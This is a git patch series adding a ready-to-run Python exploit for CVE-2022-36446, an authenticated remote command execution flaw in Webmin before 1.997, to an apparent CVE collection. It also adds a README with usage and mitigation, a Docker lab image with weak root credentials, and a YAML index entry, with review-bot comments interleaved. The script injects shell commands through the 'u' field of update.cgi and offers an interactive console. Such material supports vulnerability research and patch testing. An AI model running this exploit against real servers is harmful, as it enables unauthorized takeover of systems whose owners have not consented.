From c00b75e08c587e971d6ba0481608b58465c96118 Mon Sep 17 00:00:00 2001 From: 0CarryT0 <86938839+0CarryT0@users.noreply.github.com> Date: Wed, 29 Mar 2023 19:52:35 +0800 Subject: [PATCH 1/2] add CVE-2022-36446 --- .../2022/CVE-2022-36446/CVE-2022-36446.py | 158 ++++++++++++++++++ cve/webmin/2022/CVE-2022-36446/README.md | 59 +++++++ .../2022/CVE-2022-36446/test_env/Dockerfile | 23 +++ .../2022/CVE-2022-36446/test_env/Makefile | 21 +++ cve/webmin/2022/yaml/CVE-2022-36446.yaml | 20 +++ 5 files changed, 281 insertions(+) create mode 100644 cve/webmin/2022/CVE-2022-36446/CVE-2022-36446.py create mode 100644 cve/webmin/2022/CVE-2022-36446/README.md create mode 100644 cve/webmin/2022/CVE-2022-36446/test_env/Dockerfile create mode 100644 cve/webmin/2022/CVE-2022-36446/test_env/Makefile create mode 100644 cve/webmin/2022/yaml/CVE-2022-36446.yaml diff --git a/cve/webmin/2022/CVE-2022-36446/CVE-2022-36446.py b/cve/webmin/2022/CVE-2022-36446/CVE-2022-36446.py new file mode 100644 index 00000000..cf735bbc --- /dev/null +++ b/cve/webmin/2022/CVE-2022-36446/CVE-2022-36446.py 
@@ -0,0 +1,158 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# File name : CVE-2022-36446.py +# Author : Podalirius (@podalirius_) +# Date created : 11 Aug 2022 + +import argparse +import binascii +import html +import requests +import os +from bs4 import BeautifulSoup + + +VERSION = "1.1" + + +def parseArgs(): + print("CVE-2022-36446 - Webmin < 1.997 - Software Package Updates RCE (Authenticated) v%s - by @podalirius_\n" % VERSION) + + parser = argparse.ArgumentParser(description="CVE-2022-36446 - Webmin < 1.997 - Software Package Updates RCE (Authenticated)") + parser.add_argument("-t", "--target", default=None, required=True, help="URL to the webmin instance") + parser.add_argument("-k", "--insecure", default=False, action="store_true", help="") + + parser.add_argument("-u", "--username", default=None, required=True, help="Username to connect to the webmin.") + parser.add_argument("-p", "--password", default=None, required=True, help="Password to connect to the webmin.") + + mode = parser.add_mutually_exclusive_group(required=True) + mode.add_argument("-I", "--interactive", default=False, action="store_true", help="Interactive console mode.") + mode.add_argument("-C", "--command", default=None, help="Only execute the specified command.") + + parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)") + + return parser.parse_args() + + +def webmin_login(username, password, target, verify=True): + session = requests.Session() + + try: + r = session.post( + target + "/session_login.cgi", + verify=verify, + data={ + "user": username, + "pass": password + }, + cookies={ + "testing": "1" + } + ) + + r = session.post( + target + "/sysinfo.cgi", + verify=verify, + ) + except Exception as e: + print("[error] %s" % e) + return None + + soup = BeautifulSoup(r.content, 'lxml') + html_tag = soup.find('html') + if "data-user" in html_tag.attrs.keys(): + print("[+] Successful login as '%s' to webmin." 
% html_tag["data-user"]) + return session + else: + return None + + +def can_access_software_updates(session, target): + r = session.get(target + "/package-updates") + soup = BeautifulSoup(r.content, 'lxml') + html_tag = soup.find('html') + if "data-module" in html_tag.attrs.keys(): + return True + else: + return False + + +def CVE_2022_36446_exec(session, target, cmd): + random_tag = binascii.hexlify(os.urandom(16)).decode('utf-8') + random_tag_h, random_tag_l = random_tag[:16], random_tag[16:] + + session.headers.update({ + "Referer": "%s/package-updates/update.cgi?xnavigation=1" % target + }) + r = session.post( + target + "/package-updates/update.cgi", + data={ + "mode": "new", + "search": "ssh", + "redir": "", + "redirdesc": "", + "u": "0;echo '%s''%s'; %s; echo '%s''%s'" % (random_tag_h, random_tag_l, cmd, random_tag_h, random_tag_l), + "confirm": "Install+Now" + } + ) + # Getting command output + splited_tags = r.content.decode('utf-8').split(random_tag) + result = "" + if len(splited_tags) >= 3: + result = splited_tags[1].strip() + result = html.unescape(result) + return result + + +if __name__ == '__main__': + options = parseArgs() + + options.target = options.target.rstrip("/") + if not options.target.startswith("http://") and not options.target.startswith("https://"): + options.target = "https://" + options.target + + if options.insecure: + # Disable warnings of insecure connection for invalid certificates + requests.packages.urllib3.disable_warnings() + # Allow use of deprecated and weak cipher methods + requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL" + try: + requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL" + except AttributeError: + pass + + session = webmin_login( + username=options.username, + password=options.password, + target=options.target, + verify=not(options.insecure) + ) + + if session is not None: + if can_access_software_updates(session, options.target): + print("[+] User 
can access Software updates") + if options.interactive: + # Interactive console + while options.interactive: + cmd = input("$ ") + if cmd.strip() != "exit": + result = CVE_2022_36446_exec( + session=session, + target=options.target, + cmd=cmd + ) + print(result) + else: + options.interactive = False + else: + # Single command + if options.command is not None: + result = CVE_2022_36446_exec( + session=session, + target=options.target, + cmd=options.command + ) + print(result) + + else: + print("[!] Could not login to webmin.") diff --git a/cve/webmin/2022/CVE-2022-36446/README.md b/cve/webmin/2022/CVE-2022-36446/README.md new file mode 100644 index 00000000..9e5fff86 --- /dev/null +++ b/cve/webmin/2022/CVE-2022-36446/README.md @@ -0,0 +1,59 @@ +![](./.github/banner.png) + +
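Review bot: The `--insecure` branch of the `__main__` block appends to `requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS` outside any guard, and urllib3 2.x no longer exposes `DEFAULT_CIPHERS`, so on a current environment the flag aborts with AttributeError before `webmin_login` is ever called; moving that first assignment inside the existing `try: ... except AttributeError: pass` that already protects the pyopenssl line keeps the option usable, and `requests.packages` is itself only a compatibility alias that a direct `import urllib3` would replace. Neither `webmin_login` nor `can_access_software_updates` checks that `soup.find('html')` returned a tag before reading `.attrs`, so a non-HTML reply (redirect or error page) ends in a traceback instead of the `[!] Could not login to webmin.` message; `if html_tag is not None and "data-user" in html_tag.attrs:` covers it. `--password` is `required=True` on the command line, which leaves the credential in shell history and `ps` output; prompting with `getpass.getpass()` when `-p` is omitted avoids that. `--verbose` is parsed but never read anywhere in the file, and `-k/--insecure` has an empty `help=""`, so either document or drop both.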

+ A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin < 1.997. +
+ GitHub release (latest by date) + + YouTube Channel Subscribers +
+

+ + +## Features + + - [x] Supports HTTP and HTTPS (even with self-signed certificates with `--insecure`). + - [x] Single command execution with `--command` option. + - [x] Interactive console with `--interactive` option. + +## Usage + +``` +$ ./CVE-2022-36446.py -h +CVE-2022-36446 - Webmin < 1.997 - Software Package Updates RCE (Authenticated) v1.1 - by @podalirius_ + +usage: CVE-2022-36446.py [-h] -t TARGET [-k] -u USERNAME -p PASSWORD (-I | -C COMMAND) [-v] + +CVE-2022-36446 - Webmin < 1.997 - Software Package Updates RCE (Authenticated) + +optional arguments: + -h, --help show this help message and exit + -t TARGET, --target TARGET + URL to the webmin instance + -k, --insecure + -u USERNAME, --username USERNAME + Username to connect to the webmin. + -p PASSWORD, --password PASSWORD + Password to connect to the webmin. + -I, --interactive Interactive console mode. + -C COMMAND, --command COMMAND + Only execute the specified command. + -v, --verbose Verbose mode. (default: False) +``` + +## Mitigation + +Update to Webmin >= 1.997. + +## Demonstration + +https://user-images.githubusercontent.com/79218792/184222596-3878e169-92ec-4507-99b5-3fe2c1d39360.mp4 + +## Contributing + +Pull requests are welcome. Feel free to open an issue if you want to add other features. + +## References + - Vulnerable version: https://github.com/webmin/webmin/releases/download/1.996/webmin_1.996_all.deb + - https://github.com/webmin/webmin/commit/13f7bf9621a82d93f1e9dbd838d1e22020221bde + diff --git a/cve/webmin/2022/CVE-2022-36446/test_env/Dockerfile b/cve/webmin/2022/CVE-2022-36446/test_env/Dockerfile new file mode 100644 index 00000000..6c09694b --- /dev/null +++ b/cve/webmin/2022/CVE-2022-36446/test_env/Dockerfile 
@@ -0,0 +1,23 @@ +FROM debian:buster + +RUN apt-get -y -q update \ + && apt-get -y -q install wget tar git libnet-ssleay-perl libauthen-pam-perl libio-pty-perl unzip shared-mime-info + +RUN mkdir -p /webmin/ \ + && wget https://github.com/webmin/webmin/releases/download/1.996/webmin_1.996_all.deb -O /webmin/webmin.deb \ + && dpkg -i /webmin/webmin.deb + +RUN useradd -s /bin/bash webmin \ + && echo "webmin:webmin" | chpasswd \ + && echo "root:root" | chpasswd + +RUN echo "#!/bin/bash" > /entrypoint.sh \ + && echo "cd /usr/share/webmin" >> /entrypoint.sh \ + && echo "./webmin-init start" >> /entrypoint.sh \ + && echo "./webmin-init status" >> /entrypoint.sh \ + && echo "tail -f /var/webmin/miniserv.error" >> /entrypoint.sh \ + && chmod +x /entrypoint.sh + +EXPOSE 80 + +CMD /entrypoint.sh diff --git a/cve/webmin/2022/CVE-2022-36446/test_env/Makefile b/cve/webmin/2022/CVE-2022-36446/test_env/Makefile new file mode 100644 index 00000000..f578e2ac --- /dev/null +++ b/cve/webmin/2022/CVE-2022-36446/test_env/Makefile @@ -0,0 +1,21 @@ +.PHONY: build img + +IMGNAME := awesome_rce_webmin_1_996 +PORT := 10080 + +all : build + +build: + docker build -t $(IMGNAME):latest -f Dockerfile . + +start: build + docker run --rm -it -p $(PORT):10000 $(IMGNAME) + +background: + docker run --rm -d -p $(PORT):10000 $(IMGNAME) + +shell: + docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash + +stop: + docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') diff --git a/cve/webmin/2022/yaml/CVE-2022-36446.yaml b/cve/webmin/2022/yaml/CVE-2022-36446.yaml new file mode 100644 index 00000000..b334557e --- /dev/null +++ b/cve/webmin/2022/yaml/CVE-2022-36446.yaml 
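Review bot: `EXPOSE 80` near the end of the Dockerfile does not match the port the lab actually serves; the Makefile publishes `$(PORT):10000`, Webmin's default, so the line should read `EXPOSE 10000`. The `.deb` fetched with `wget` goes straight into `dpkg -i` without any verification of the download, so a pinned checksum such as `echo "<sha256-placeholder>  /webmin/webmin.deb" | sha256sum -c` before the `dpkg -i` step would make the image reproducible and catch a tampered or truncated artifact. The image also sets `root:root` and `webmin:webmin`, which is acceptable for a throwaway lab but should be stated in the file, e.g. `# Lab-only credentials: this image is intentionally weak, run it on localhost only`.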
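Review bot: `.PHONY: build img` declares a target `img` that does not exist in the Makefile while `all`, `start`, `background`, `shell` and `stop` are not declared phony, so the line should be `.PHONY: all build start background shell stop`. The `docker ps | grep $(IMGNAME) | awk ...` pipeline in `shell` and `stop` matches any container whose listing line merely contains the image name; `docker ps -q --filter ancestor=$(IMGNAME):latest` returns exactly the container ids started from this image and drops the awk step.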
@@ -0,0 +1,20 @@ +id: CVE-2022-36446 +source: https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE +info: + name: Webmin是用于类Unix系统的基于Web的服务器管理控制面板。 + severity: CRITICAL + description: | + 1.997之前Webmin中的software/apt-lib.pl缺少UI命令的HTML转义。 + scope-of-influence: + webmin < 1.997 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-36446 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-36446 + cwe-id: CWE-116 + cnvd-id: None + kve-id: None + tags: cve2022, RCE + \ No newline at end of file -- Gitee From ab0bd0bcd6418e577de3182af94f31d5b59eaeed Mon Sep 17 00:00:00 2001 From: 0CarryT0 <86938839+0CarryT0@users.noreply.github.com> Date: Wed, 29 Mar 2023 20:06:32 +0800 Subject: [PATCH 2/2] add CVE-2022-36446 --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 9bd0c3cc..ff5ee39a 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -144,6 +144,7 @@ cve: - CVE-2022-31692 webmin: - CVE-2022-0824 + - CVE-2022-36446 Zimbra: - CVE-2022-27925 cnvd: -- Gitee
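Review bot: `cvss-metrics` in the new yaml carries `PR:N`, but the entry describes an authenticated RCE and the script added in this same commit makes `--username` and `--password` required, so the vector string and the derived `cvss-score: 9.8` look inconsistent with the entry itself; confirm against the NVD record listed under `reference` and correct the string, since an authenticated vector would carry `PR:L`. The `name` field holds a one-sentence description of Webmin rather than the vulnerability's name, so the index entry is not searchable by what it covers; `name: Webmin < 1.997 Software Package Updates authenticated RCE` would fix that. The final added line is whitespace only and lacks a trailing newline, as `\ No newline at end of file` flags, so it should be dropped.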